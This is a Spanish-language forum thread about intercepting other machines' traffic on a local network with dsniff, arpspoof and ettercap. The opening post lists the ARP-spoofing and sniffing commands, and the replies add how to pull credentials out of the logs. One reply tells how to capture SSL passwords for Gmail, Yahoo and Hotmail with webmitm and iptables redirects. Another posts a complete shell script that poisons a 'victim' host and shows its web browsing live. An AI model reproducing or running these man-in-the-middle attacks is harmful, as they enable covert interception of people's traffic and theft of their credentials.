Problema esnifando paquetes con dsniff en linux

Iniciado por neo444, 16 Septiembre 2010, 19:30 PM

0 Miembros y 1 Visitante están viendo este tema.

neo444

Hice un tema parecido hace unos dias pero me lo borraron cruelmente con la palabra BUSCA!!!, xD, así que eso he hecho, he avanzado un poco más pero sigo sin conseguir leer logs y tengo dos preguntas con este tema
Tengo Linux Ubuntu y he hecho esto tanto usando la suite dsniff

192.168.1.1 puerta de enlace
192.168.1.2 víctima
192.168.1.3 víctima

-Con dsniff
Abro 3 terminales:
Código:

root@laptop:/home/usr/# echo 1 > /proc/sys/net/ipv4/ip_forward
root@laptop:/home/usr/# arpspoof -i wlan0 -t 192.168.1.2 192.168.1.1

Código:

root@laptop:/home/usr/# arpspoof -i wlan0 -t 192.168.1.1 192.168.1.2

Código:

dsniff -i wlan0

Haciendo esto he de suponer que en la terminal me irán saliendo los paquetes que intercepte, pero no aparece nada, si uso:
dsniff -i wlan0 -w log
Entonces me crea ese archivo que veo que si ocupa espacio así que algo tendrá pero no puedo abrirlo, he leido en la doc. del dsniff que esos archivos son formato berkeley db, y me he bajado el src de berkeley, compilado e instalado, pero no se cómo abrirlo, así que esta es mi primera pregunta.

No he encontrado nada en internet que diga como abrir archivos berkeley db.

La segunda pregunta es que plugin para el ettercap necesito (tampoco encontré nada en internet), para que en la caja User messages me de users y pass directamente, sin tener que buscar en la conexión, ya lo instalé desde el código haciendo:

./configure --enable-plugins --enable-debug

pero me instala veinti tantos plugins, y según he leido por ahí debería tener más de treinta.



Y por último ahora sí que sí.

en el ettercap leí que para que interceptara contraseñas encriptadas en ssl, solo había que quitar  el comentario de una linea del /etc/etter.conf, que el propio programa crea un certificado in the air, y lo manda al usuario cada vez que este intenta un envío SSL, esto me parecía tan simple y subrrealista que no me lo creí, y después de intentarlo no intercetó nada en páginas que se que usan SSL como GMail, esa linea es:

redir_command_on = "iptables -t nat -A PREROUTING -i %iface -p tcp --dport %port -j REDIRECT --to-port %rport"

Me podeís explicar que hace exactamente esta linea

Gracias, y pediría que si alguna de mis preguntas es absurda (soy nuevo en esto), puede que otra no lo sea tanto, pero me gustaría que no cerrarais el post, gracias.

Todo esto lo hago con mi propia conexión a Internet con ordenadores de mi propiedad, simplemente quiero saber y aprender

maverik35

Hola neo..Lo estas haciendo bien..Redireccionas el trafico de la victima con ip_forward, esto para que no se corte la conexion de la victima...ya hiciste el envenenamiento de arps con el arpspoof en las 2 direcciones...Se captura bien tu info en Log..Pero a veces ese archivo trae un candadito, lo puedes vizualizar?..Solo cambiale los permisos con chmod 777 log.....O lo copias a otro directorio..Recuerda que el que crea el archivo es el propietario, pero al copiarlo, tu lo creas en esa nueva carpeta, y desaparece el candadito del archivo...Despues usa tcpxtract, descargalo desde repos o desde la pag. del autor...Si quieres hazlo desde repos (Synaptics o aptitude install tcpxtract, esto como root).
Solo haz tcpxtract -f log -o NOMBRE_DE_ARCHIVO_DE_SALIDA
Recuerda que tienes varias formas de snifear la red:
  Captura de Texto y Graficos: dsniff, tcpdump (mi favorito), wireshark, ettercap.
  Si lo haces a mano, como tu lo hiciste, con 3 terminales, haces tu envenenamiento de arps, y usas el tcpdump, o dsniff o wireshark desde linea de comandos..Si lo quieres con interface grafica, usa Wireshark, pero primero haz tu envenenamiento...
  dsniff es una suite, trae varios programas, webspy, mailsnarf, msgsnarf, webspy, etc..Una vez envevenado la victima, puedes usar todos a la vez, en varias ventanas...
Si lo que quieres es snifear ssl (claves como gmail, yahoo, hotmail), lo haces a pie con linea de comandos o usas ettercap..Ettercap haces el envenenamiento de forma grafica..Yo prefiero a mano, configuras el archivo etter.conf y ya esta listo para ssl/TSL...
Si vas a mano, usas las iptables, arpspoof y webmitm (parte del dsniff)...
Saludos y suerte...

cocoswit

Me hice este pequeño script que a mi me va fenómeno.
Capturas el tráfico, arranca el firefox y te muestra en tiempo real las webs que está visitando la víctima.

Descarga

Código:


#!/bin/sh

# sniff.sh
# 22/11/2007 Created by CocoSwit
#
# sniff.sh is a sniffing web script for local-red
# Copy, use it, modify, do what you want with, but under ALWAYS YOUR responsibility.
# sniff.sh es un script para sniffing web en una red local
# Copialo, usalo, modificalo, haz con el lo que quieras, pero SIEMPRE bajo TU responsabilidad.


# La tarjeta de red es $3 , la Ip victima es $1  y la ip del router es $2

if [ $# -ne 3 ]
   then
   echo
   echo ERROR: faltan parametros
   echo
   echo Usa: $0 ip-victima ip-router tarjeta-red
   echo Ejemplo: $0 192.168.1.101 192.168.1.1 eth1
   exit
else
   # Activamos el ip_forward para poder reenviar el trafico a la victima
   echo 1 > /proc/sys/net/ipv4/ip_forward
   echo La tarjeta de red es $3 , la Ip victima es $1  y la ip del router es $2
   # Ejecutamos en un terminal arpspoof entre la ip victima y la ip de la puerta de enlaze, mas otro arpspoof entre la puerta de enlace y la victima, arrancamos el firefox y capturamos el trafico.
   xterm -bg black -fg green -e arpspoof -i $3 -t $1 $2 & xterm -bg black -fg green -e arpspoof -i $3 -t $2 $1 & firefox & xterm -bg black -fg blue -e webspy -i $3 $1
fi